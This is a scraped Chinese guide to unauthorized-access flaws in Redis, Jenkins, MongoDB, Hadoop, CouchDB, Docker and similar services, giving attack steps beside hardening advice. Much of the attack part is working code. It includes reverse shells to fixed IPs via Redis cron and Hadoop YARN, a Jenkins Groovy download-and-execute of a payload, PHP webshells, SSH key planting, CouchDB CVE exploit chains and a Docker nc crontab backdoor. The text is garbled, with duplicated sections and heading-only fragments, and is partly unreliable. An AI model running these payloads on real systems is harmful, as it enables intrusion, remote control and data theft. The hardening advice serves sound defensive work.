模块<\/th>	节点<\/th>	默认端口<\/th> <\/tr> <\/thead>
HDFS<\/td>	NameNode<\/td>	50070<\/td> <\/tr>
HDFS<\/td>	SecondNameNode<\/td>	50090<\/td> <\/tr>
HDFS<\/td>	DataNode<\/td>	50075<\/td> <\/tr>
MapReduce<\/td>	JobTracker<\/td>	50030<\/td> <\/tr> <\/tbody> <\/table> 2. 攻击方法<\/h3> Python攻击脚本：<\/p> import<\/span> requests <\/span><\/span>target =<\/span> 'http:\/\/127.0.0.1:8088\/'<\/span> <\/span><\/span>lhost =<\/span> '192.168.0.1'<\/span> <\/span><\/span>url =<\/span> target +<\/span> 'ws\/v1\/cluster\/apps\/new-application'<\/span> <\/span><\/span>resp =<\/span> requests.<\/span>post(url) <\/span><\/span>app_id =<\/span> resp.<\/span>json()['application-id'<\/span>] <\/span><\/span>url =<\/span> target +<\/span> 'ws\/v1\/cluster\/apps'<\/span> <\/span><\/span>data =<\/span> { <\/span><\/span> 'application-id'<\/span>: app_id, <\/span><\/span> 'application-name'<\/span>: 'get-shell'<\/span>, <\/span><\/span> 'am-container-spec'<\/span>: { <\/span><\/span> 'commands'<\/span>: { <\/span><\/span> 'command'<\/span>: '\/bin\/bash -i >& \/dev\/tcp\/<\/span>%s<\/span>\/9999 0>&1'<\/span> %<\/span> lhost, <\/span><\/span> }, <\/span><\/span> }, <\/span><\/span> 'application-type'<\/span>: 'YARN'<\/span>, <\/span><\/span>} <\/span><\/span>requests.<\/span>post(url, json=<\/span>data) <\/span><\/span><\/code><\/pre>3. 防护措施<\/h3> 网络访问控制<\/li> 启用Kerberos认证<\/li> 定期更新补丁<\/li> <\/ol> 0x08 CouchDB未授权访问<\/h2> 1. 漏洞利用（CVE-2017-12635和CVE-2017-12636）<\/h3> 1.6.0版本利用：<\/h4> curl -X PUT 'http:\/\/vulhub:vulhub@your-ip:5984\/_config\/query_servers\/cmd'<\/span> -d '"id >\/tmp\/success"'<\/span> <\/span><\/span>curl -X PUT 'http:\/\/vulhub:vulhub@your-ip:5984\/vultest'<\/span> <\/span><\/span>curl -X PUT 'http:\/\/vulhub:vulhub@your-ip:5984\/vultest\/vul'<\/span> -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'<\/span> <\/span><\/span>curl -X POST 'http:\/\/vulhub:vulhub@your-ip:5984\/vultest\/_temp_view?limit=10'<\/span> -d '{"language":"cmd","map":""}'<\/span> -H 'Content-Type:application\/json'<\/span> <\/span><\/span><\/code><\/pre>2.1.0版本利用：<\/h4> curl http:\/\/vulhub:vulhub@your-ip:5984\/_membership <\/span><\/span>curl -X PUT http:\/\/vulhub:vulhub@your-ip:5984\/_node\/nonode@nohost\/_config\/query_servers\/cmd -d '"id >\/tmp\/success"'<\/span> <\/span><\/span>curl -X PUT 'http:\/\/vulhub:vulhub@your-ip:5984\/vultest'<\/span> <\/span><\/span>curl -X PUT 'http:\/\/vulhub:vulhub@your-ip:5984\/vultest\/vul'<\/span> -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'<\/span> <\/span><\/span>curl -X PUT http:\/\/vulhub:vulhub@your-ip:5984\/vultest\/_design\/vul -d '{"_id":"_design\/test","views":{"wooyun":{"map"language":"cmd"}'<\/span> -H "Content-Type: application\/json"<\/span> <\/span><\/span><\/code><\/pre>2. 防护措施<\/h3> 绑定IP到127.0.0.1<\/li> 设置访问密码<\/li> 修改默认配置<\/li> <\/ol> 0x09 Docker未授权访问<\/h2> 1. 漏洞利用<\/h3> Python攻击脚本：<\/h4> import<\/span> docker <\/span><\/span>client =<\/span> docker.<\/span>DockerClient(base_url=<\/span>'http:\/\/your-ip:2375\/'<\/span>) <\/span><\/span>data =<\/span> client.<\/span>containers.<\/span>run('alpine:latest'<\/span>, r<\/span>'''sh -c "echo usr\/bin\/nc your-ip 21 -e \/bin\/sh' >> \/tmp\/etc\/crontabs\/root" '''<\/span>, remove=<\/span>True<\/span>, volumes=<\/span>{'\/etc'<\/span>: {'bind'<\/span>: '\/tmp\/etc'<\/span>, 'mode'<\/span>: 'rw'<\/span>}}) <\/span><\/span><\/code><\/pre>自动化工具：<\/h4> docker_api_vul<\/a><\/li> docker-remote-api-exp<\/a><\/li> <\/ul> 2. 防护措施<\/h3> 修改Docker Remote API默认参数<\/li> 设置认证措施<\/li> 使用低权限账号运行Docker<\/li> 配置防火墙策略<\/li> <\/ol> 0x10 总结建议<\/h2> 关注最新漏洞情况，及时修复<\/li> 梳理内部开放服务，内网服务不开放公网<\/li> 开放公网的服务必须做好访问控制<\/li> 避免使用弱密码<\/li> 定期进行安全审计和漏洞扫描<\/li> <\/ol> 通过实施上述防护措施，可以有效降低未授权访问漏洞带来的安全风险，保护企业关键业务系统和数据安全。<\/p>

未授权访问漏洞全面分析与防护指南<\/h1>

0x00 前言<\/h2>
本文汇总了多种常见服务的未授权访问漏洞，包括Redis、Jenkins、MongoDB、ZooKeeper、Elasticsearch、Memcache、Hadoop、CouchDB和Docker等，详细介绍了每种漏洞的扫描探测方法、攻击利用技术以及防护措施。<\/p>

0x01 Redis未授权访问<\/h2>

1. 扫描探测<\/h3>

配置Redis测试环境<\/h4>

vim \/etc\/redis.conf
<\/span><\/span>cp redis.conf .\/src\/redis.conf
<\/span><\/span># 注释掉bind 127.0.0.1或改为0.0.0.0<\/span>
<\/span><\/span># 设置protected-mode为no<\/span>
<\/span><\/span>src\/redis-server redis.conf
<\/span><\/span><\/code><\/pre>常用Redis命令<\/h4>

info<\/code> - 查看信息<\/li>
flushall<\/code> - 删除所有数据库内容<\/li>
flushdb<\/code> - 刷新数据库<\/li>
KEYS *<\/code> - 查看所有键<\/li>
set test "who am i"<\/code> - 设置变量<\/li>
config set dir dirpath<\/code> - 设置路径<\/li>
config get dir\/dbfilename<\/code> - 获取路径及数据配置<\/li>
save<\/code> - 保存<\/li>
<\/ul>
工具利用<\/h4>

Metasploit模块：

auxiliary\/scanner\/redis\/file_upload<\/li>
auxiliary\/scanner\/redis\/redis_login<\/li>
auxiliary\/scanner\/redis\/redis_server<\/li>
<\/ul>
<\/li>
Nmap扫描脚本：匿名扫描脚本<\/a><\/li>
<\/ul>
2. 攻击方法<\/h3>
1) 利用计划任务反弹shell<\/h4>
# 攻击者监听<\/span>
<\/span><\/span>nc -lvnp 7999<\/span>
<\/span><\/span>
<\/span><\/span># Redis执行<\/span>
<\/span><\/span>set x "\n*bash -i >& \/dev\/tcp\/192.168.63.128\/7999 0>&1\n"<\/span>
<\/span><\/span>config set dir \/var\/spool\/cron\/
<\/span><\/span>config set dbfilename root
<\/span><\/span>save
<\/span><\/span><\/code><\/pre>2) 写SSH公钥登录<\/h4>
# 本地生成密钥<\/span>
<\/span><\/span>ssh-keygen -t rsa
<\/span><\/span>
<\/span><\/span># Redis执行<\/span>
<\/span><\/span>(<\/span>echo -e "\n\n"<\/span>; cat id_rsa.pub; echo -e "\n\n"<\/span>)<\/span> > foo.txt
<\/span><\/span>cat foo.txt | redis-cli -h x.x.x.x -x set crackit
<\/span><\/span>redis-cli -h x.x.x.x
<\/span><\/span>> config set dir \/root\/.ssh\/
<\/span><\/span>> config set dbfilename "authorized_keys"<\/span>
<\/span><\/span>> save
<\/span><\/span>
<\/span><\/span># 使用私钥登录<\/span>
<\/span><\/span>ssh -i id_rsa root@x.x.x.x
<\/span><\/span><\/code><\/pre>3) 写webshell<\/h4>
config set dir \/var\/www\/html\/
<\/span><\/span>config set dbfilename shell.php
<\/span><\/span>set x "<?php phpinfo();?>"<\/span>
<\/span><\/span>save
<\/span><\/span><\/code><\/pre>4) 写二进制文件<\/h4>
使用Lua脚本关闭压缩并写入二进制文件，然后通过计划任务调用Python清洗数据。<\/p>
5) 自动化工具<\/h4>

redis_exp.py<\/a><\/li>
批量验证工具<\/a><\/li>
<\/ul>
3. 防护措施<\/h3>


禁用高危命令<\/strong>：<\/p>
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
<\/code><\/pre>
<\/li>

低权限运行<\/strong>：<\/p>
groupadd -r redis &&<\/span> useradd -r -g redis redis
<\/span><\/span><\/code><\/pre><\/li>

添加密码验证<\/strong>：<\/p>
requirepass mypassword
<\/code><\/pre>
<\/li>

禁止外网访问<\/strong>：<\/p>
bind 127.0.0.1
<\/code><\/pre>
<\/li>

保护SSH密钥<\/strong>：<\/p>
chmod 400<\/span> ~\/.ssh\/authorized_keys
<\/span><\/span>chattr +i ~\/.ssh\/authorized_keys
<\/span><\/span>chattr +i ~\/.ssh
<\/span><\/span><\/code><\/pre><\/li>

修改默认端口<\/strong>：<\/p>
redis-server --port 6380<\/span>
<\/span><\/span><\/code><\/pre><\/li>

防火墙规则<\/strong>：<\/p>
iptables -A INPUT -p tcp -s 127.0.0.1 --dport 6379<\/span> -j ACCEPT
<\/span><\/span>iptables -I INPUT -p tcp --dport 6379<\/span> -j DROP
<\/span><\/span>service iptables save
<\/span><\/span>service iptables restart
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x02 Jenkins未授权访问<\/h2>
1. 扫描探测<\/h3>

弱口令扫描工具：Jenkins<\/a><\/li>
CVE-2017-1000353漏洞<\/li>
<\/ul>
2. 攻击利用<\/h3>
1) 反弹shell<\/h4>
println "wget http:\/\/192.168.3.131:8081\/exp -P \/tmp\/"<\/span>.<\/span>execute<\/span>().<\/span>text<\/span>
<\/span><\/span>println "chmod +x \/tmp\/exp"<\/span>.<\/span>execute<\/span>().<\/span>text<\/span>
<\/span><\/span>println "\/tmp\/exp"<\/span>.<\/span>execute<\/span>().<\/span>text<\/span>
<\/span><\/span><\/code><\/pre>2) 写webshell<\/h4>
new<\/span> File<\/span>(<\/span>"\/var\/www\/html\/shell.php"<\/span>).<\/span>write<\/span>(<\/span>'<?php @eval($_POST[shell]);?>'<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3) 读文件<\/h4>
try<\/span>{<\/span>
<\/span><\/span>    text =<\/span> new<\/span> File(<\/span>"\/etc\/passwd"<\/span>).<\/span>getText<\/span>();<\/span>
<\/span><\/span>    out.<\/span>print<\/span> text
<\/span><\/span>}<\/span> catch<\/span>(<\/span>Exception e){}<\/span>
<\/span><\/span><\/code><\/pre>4) 执行命令<\/h4>
def<\/span> sout =<\/span> new<\/span> StringBuilder(),<\/span> serr =<\/span> new<\/span> StringBuilder()<\/span>
<\/span><\/span>def<\/span> proc =<\/span> 'cat \/etc\/passwd'<\/span>.<\/span>execute<\/span>()<\/span>
<\/span><\/span>proc.<\/span>consumeProcessOutput<\/span>(<\/span>sout,<\/span> serr)<\/span>
<\/span><\/span>proc.<\/span>waitForOrKill<\/span>(<\/span>1000<\/span>)<\/span>
<\/span><\/span>println "out> $sout err> $serr"<\/span>
<\/span><\/span><\/code><\/pre>3. 防护措施<\/h3>

在管理页面添加强密码<\/li>
不要将管理后台开放到互联网<\/li>
使用ECS安全组策略设置访问控制<\/li>
为不同用户分配适当的权限<\/li>
<\/ol>
0x03 MongoDB未授权访问<\/h2>
1. 扫描探测<\/h3>
Nmap扫描<\/h4>
nmap -p 27017<\/span> --script mongodb-info <ip>
<\/span><\/span><\/code><\/pre>配置修改<\/h4>
dbpath = \/data\/
logpath = \/var\/logs\/mongodb.log
#port = 27017
#fork = true
bind_ip = 0.0.0.0
<\/code><\/pre>
Python扫描脚本<\/h4>
import<\/span> socket
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> pymongo
<\/span><\/span>
<\/span><\/span>def<\/span> Scanner<\/span>(ip):
<\/span><\/span>    sk =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>    sk.<\/span>settimeout(0.3<\/span>)
<\/span><\/span>    try<\/span>:
<\/span><\/span>        sk.<\/span>connect((ip,27017<\/span>))
<\/span><\/span>        ipcons.<\/span>append(ip)
<\/span><\/span>        sk.<\/span>close()
<\/span><\/span>    except<\/span> Exception<\/span>:
<\/span><\/span>        pass<\/span>
<\/span><\/span><\/code><\/pre>2. 攻击利用<\/h3>

NoSQLAttack<\/a><\/li>
x-crack爆破工具<\/a><\/li>
<\/ul>
3. 防护措施<\/h3>


创建管理账户<\/strong>：<\/p>
use<\/span> admin<\/span>
<\/span><\/span>db<\/span>.createUser<\/span>({
<\/span><\/span>  user<\/span>:<\/span> "adminUser"<\/span>,
<\/span><\/span>  pwd<\/span>:<\/span> "adminPass"<\/span>,
<\/span><\/span>  roles<\/span>:<\/span> [ { role<\/span>:<\/span> "userAdminAnyDatabase"<\/span>, db<\/span>:<\/span> "admin"<\/span> } ]
<\/span><\/span>})
<\/span><\/span><\/code><\/pre><\/li>

本地访问限制<\/strong>：<\/p>
bind 127.0.0.1
<\/code><\/pre>
<\/li>

修改默认端口<\/strong><\/p>
<\/li>

禁用HTTP\/REST接口<\/strong>：<\/p>
nohttpinterface = false
<\/code><\/pre>
<\/li>

开启日志审计<\/strong><\/p>
<\/li>

启用auth认证<\/strong>：<\/p>
auth = true
<\/code><\/pre>
<\/li>
<\/ol>
0x04 ZooKeeper未授权访问<\/h2>
1. 扫描探测<\/h3>
.\/zkCli.sh -server 127.0.0.1 2181<\/span>
<\/span><\/span>nmap -sS -p2181 -oG zookeeper.gnmap 192.168.1.0\/24
<\/span><\/span><\/code><\/pre>2. 信息获取<\/h3>

echo stat |ncat 127.0.0.1 2181<\/code><\/li>
echo ruok |ncat 127.0.0.1 2181<\/code><\/li>
echo reqs |ncat 127.0.0.1 2181<\/code><\/li>
echo envi |ncat 127.0.0.1 2181<\/code><\/li>
echo dump |ncat 127.0.0.1 2181<\/code><\/li>
<\/ul>
3. 防护措施<\/h3>

禁止Zookeeper直接暴露在公网<\/li>
添加访问控制（认证用户、用户名密码、指定IP）<\/li>
<\/ol>
0x05 Elasticsearch未授权访问<\/h2>
1. 漏洞检测<\/h3>
curl http:\/\/127.0.0.1:9200\/_cat\/indices
<\/span><\/span><\/code><\/pre>2. 防护措施<\/h3>


防火墙限制<\/strong>：<\/p>
iptables -A INPUT -p tcp -s 127.0.0.1 --dport 9200<\/span> -j ACCEPT
<\/span><\/span>iptables -I INPUT -p tcp --dport 9200<\/span> -j DROP
<\/span><\/span><\/code><\/pre><\/li>

Nginx反向代理<\/strong>：

配置HTTP basic认证<\/p>
<\/li>

插件认证<\/strong>：<\/p>

Shield（收费）<\/li>
elasticsearch-http-basic<\/li>
searchguard<\/li>
<\/ul>
<\/li>

配置文件认证<\/strong>：<\/p>
http.basic.enabled true
http.basic.user "admin"
http.basic.password "admin_pw"
http.basic.ipwhitelist ["localhost", "127.0.0.1"]
<\/code><\/pre>
<\/li>
<\/ol>
0x06 Memcache未授权访问<\/h2>
1. 扫描探测<\/h3>
Python检测脚本：<\/p>
def<\/span> Memcache_check<\/span>(ip, port=<\/span>11211<\/span>, timeout=<\/span>5<\/span>):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        socket.<\/span>setdefaulttimeout(timeout)
<\/span><\/span>        s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>        s.<\/span>connect((ip, int(port)))
<\/span><\/span>        s.<\/span>send("stats<\/span>\r\n<\/span>"<\/span>)
<\/span><\/span>        result =<\/span> s.<\/span>recv(1024<\/span>)
<\/span><\/span>        if<\/span> "STAT version"<\/span> in<\/span> result:
<\/span><\/span>            print '[+] Memcache Unauthorized: '<\/span> +<\/span>ip+<\/span>':'<\/span>+<\/span>str(port)
<\/span><\/span>    except<\/span> Exception<\/span>, e:
<\/span><\/span>        pass<\/span>
<\/span><\/span><\/code><\/pre>2. 攻击利用<\/h3>
常用命令：<\/p>

stats<\/code> - 查看状态<\/li>
stats items<\/code> - 查看所有items<\/li>
stats cachedump 32 0<\/code> - 获取缓存key<\/li>
get :state:264861539228401373:261588<\/code> - 读取缓存值<\/li>
<\/ul>
3. 防护措施<\/h3>


限制访问<\/strong>：<\/p>
memcached -d -m 1024<\/span> -u root -l 127.0.0.1 -p 11211<\/span> -c 1024<\/span> -P \/tmp\/memcached.pid
<\/span><\/span><\/code><\/pre><\/li>

防火墙规则<\/strong>：<\/p>
iptables -A INPUT -p tcp -s 127.0.0.1 --dport 11211<\/span> -j ACCEPT
<\/span><\/span>iptables -I INPUT -p tcp --dport 11211<\/span> -j DROP
<\/span><\/span><\/code><\/pre><\/li>

最小权限运行<\/strong>：<\/p>
memcached -d -m 1024<\/span> -u memcached -l 127.0.0.1 -p 11211<\/span> -c 1024<\/span> -P \/tmp\/memcached.pid
<\/span><\/span><\/code><\/pre><\/li>

SASL认证<\/strong><\/p>
<\/li>

修改默认端口<\/strong><\/p>
<\/li>
<\/ol>
0x07 Hadoop未授权访问<\/h2>
1. 常见端口<\/h3>



模块<\/th>
节点<\/th>
默认端口<\/th>
<\/tr>
<\/thead>


HDFS<\/td>
NameNode<\/td>
50070<\/td>
<\/tr>

HDFS<\/td>
SecondNameNode<\/td>
50090<\/td>
<\/tr>

HDFS<\/td>
DataNode<\/td>
50075<\/td>
<\/tr>

MapReduce<\/td>
JobTracker<\/td>
50030<\/td>
<\/tr>
<\/tbody>
<\/table>
2. 攻击方法<\/h3>
Python攻击脚本：<\/p>
import<\/span> requests
<\/span><\/span>target =<\/span> 'http:\/\/127.0.0.1:8088\/'<\/span>
<\/span><\/span>lhost =<\/span> '192.168.0.1'<\/span> 
<\/span><\/span>url =<\/span> target +<\/span> 'ws\/v1\/cluster\/apps\/new-application'<\/span>
<\/span><\/span>resp =<\/span> requests.<\/span>post(url)
<\/span><\/span>app_id =<\/span> resp.<\/span>json()['application-id'<\/span>]
<\/span><\/span>url =<\/span> target +<\/span> 'ws\/v1\/cluster\/apps'<\/span>
<\/span><\/span>data =<\/span> {
<\/span><\/span>    'application-id'<\/span>: app_id,
<\/span><\/span>    'application-name'<\/span>: 'get-shell'<\/span>,
<\/span><\/span>    'am-container-spec'<\/span>: {
<\/span><\/span>        'commands'<\/span>: {
<\/span><\/span>            'command'<\/span>: '\/bin\/bash -i >& \/dev\/tcp\/<\/span>%s<\/span>\/9999 0>&1'<\/span> %<\/span> lhost,
<\/span><\/span>        },
<\/span><\/span>    },
<\/span><\/span>    'application-type'<\/span>: 'YARN'<\/span>,
<\/span><\/span>}
<\/span><\/span>requests.<\/span>post(url, json=<\/span>data)
<\/span><\/span><\/code><\/pre>3. 防护措施<\/h3>

网络访问控制<\/li>
启用Kerberos认证<\/li>
定期更新补丁<\/li>
<\/ol>
0x08 CouchDB未授权访问<\/h2>
1. 漏洞利用（CVE-2017-12635和CVE-2017-12636）<\/h3>
1.6.0版本利用：<\/h4>
curl -X PUT 'http:\/\/vulhub:vulhub@your-ip:5984\/_config\/query_servers\/cmd'<\/span> -d '"id >\/tmp\/success"'<\/span>
<\/span><\/span>curl -X PUT 'http:\/\/vulhub:vulhub@your-ip:5984\/vultest'<\/span>
<\/span><\/span>curl -X PUT 'http:\/\/vulhub:vulhub@your-ip:5984\/vultest\/vul'<\/span> -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'<\/span>
<\/span><\/span>curl -X POST 'http:\/\/vulhub:vulhub@your-ip:5984\/vultest\/_temp_view?limit=10'<\/span> -d '{"language":"cmd","map":""}'<\/span> -H 'Content-Type:application\/json'<\/span>
<\/span><\/span><\/code><\/pre>2.1.0版本利用：<\/h4>
curl http:\/\/vulhub:vulhub@your-ip:5984\/_membership
<\/span><\/span>curl -X PUT http:\/\/vulhub:vulhub@your-ip:5984\/_node\/nonode@nohost\/_config\/query_servers\/cmd -d '"id >\/tmp\/success"'<\/span>
<\/span><\/span>curl -X PUT 'http:\/\/vulhub:vulhub@your-ip:5984\/vultest'<\/span>
<\/span><\/span>curl -X PUT 'http:\/\/vulhub:vulhub@your-ip:5984\/vultest\/vul'<\/span> -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'<\/span>
<\/span><\/span>curl -X PUT http:\/\/vulhub:vulhub@your-ip:5984\/vultest\/_design\/vul -d '{"_id":"_design\/test","views":{"wooyun":{"map"language":"cmd"}'<\/span> -H "Content-Type: application\/json"<\/span>
<\/span><\/span><\/code><\/pre>2. 防护措施<\/h3>

绑定IP到127.0.0.1<\/li>
设置访问密码<\/li>
修改默认配置<\/li>
<\/ol>
0x09 Docker未授权访问<\/h2>
1. 漏洞利用<\/h3>
Python攻击脚本：<\/h4>
import<\/span> docker
<\/span><\/span>client =<\/span> docker.<\/span>DockerClient(base_url=<\/span>'http:\/\/your-ip:2375\/'<\/span>)
<\/span><\/span>data =<\/span> client.<\/span>containers.<\/span>run('alpine:latest'<\/span>, r<\/span>'''sh -c "echo usr\/bin\/nc your-ip 21 -e \/bin\/sh' >> \/tmp\/etc\/crontabs\/root" '''<\/span>, remove=<\/span>True<\/span>, volumes=<\/span>{'\/etc'<\/span>: {'bind'<\/span>: '\/tmp\/etc'<\/span>, 'mode'<\/span>: 'rw'<\/span>}})
<\/span><\/span><\/code><\/pre>自动化工具：<\/h4>

docker_api_vul<\/a><\/li>
docker-remote-api-exp<\/a><\/li>
<\/ul>
2. 防护措施<\/h3>

修改Docker Remote API默认参数<\/li>
设置认证措施<\/li>
使用低权限账号运行Docker<\/li>
配置防火墙策略<\/li>
<\/ol>
0x10 总结建议<\/h2>

关注最新漏洞情况，及时修复<\/li>
梳理内部开放服务，内网服务不开放公网<\/li>
开放公网的服务必须做好访问控制<\/li>
避免使用弱密码<\/li>
定期进行安全审计和漏洞扫描<\/li>
<\/ol>
通过实施上述防护措施，可以有效降低未授权访问漏洞带来的安全风险，保护企业关键业务系统和数据安全。<\/p>

未授权访问漏洞全面分析与防护指南<\/h1>

0x00 前言<\/h2> 本文汇总了多种常见服务的未授权访问漏洞，包括Redis、Jenkins、MongoDB、ZooKeeper、Elasticsearch、Memcache、Hadoop、CouchDB和Docker等，详细介绍了每种漏洞的扫描探测方法、攻击利用技术以及防护措施。<\/p>

0x01 Redis未授权访问<\/h2>

1. 扫描探测<\/h3>

2. 攻击方法<\/h3>

4) 写二进制文件<\/h4> 使用Lua脚本关闭压缩并写入二进制文件，然后通过计划任务调用Python清洗数据。<\/p>

5) 自动化工具<\/h4> redis_exp.py<\/a><\/li> 批量验证工具<\/a><\/li> <\/ul> 3. 防护措施<\/h3> 禁用高危命令<\/strong>：<\/p>

3. 防护措施<\/h3> 禁用高危命令<\/strong>：<\/p>

0x02 Jenkins未授权访问<\/h2>

2. 攻击利用<\/h3>

0x03 MongoDB未授权访问<\/h2>

1. 扫描探测<\/h3>

0x04 ZooKeeper未授权访问<\/h2>

0x05 Elasticsearch未授权访问<\/h2>

0x06 Memcache未授权访问<\/h2>

0x08 CouchDB未授权访问<\/h2>

1. 漏洞利用（CVE-2017-12635和CVE-2017-12636）<\/h3>

0x09 Docker未授权访问<\/h2>

1. 漏洞利用<\/h3>

0x00 前言<\/h2>
本文汇总了多种常见服务的未授权访问漏洞，包括Redis、Jenkins、MongoDB、ZooKeeper、Elasticsearch、Memcache、Hadoop、CouchDB和Docker等，详细介绍了每种漏洞的扫描探测方法、攻击利用技术以及防护措施。<\/p>

4) 写二进制文件<\/h4>
使用Lua脚本关闭压缩并写入二进制文件，然后通过计划任务调用Python清洗数据。<\/p>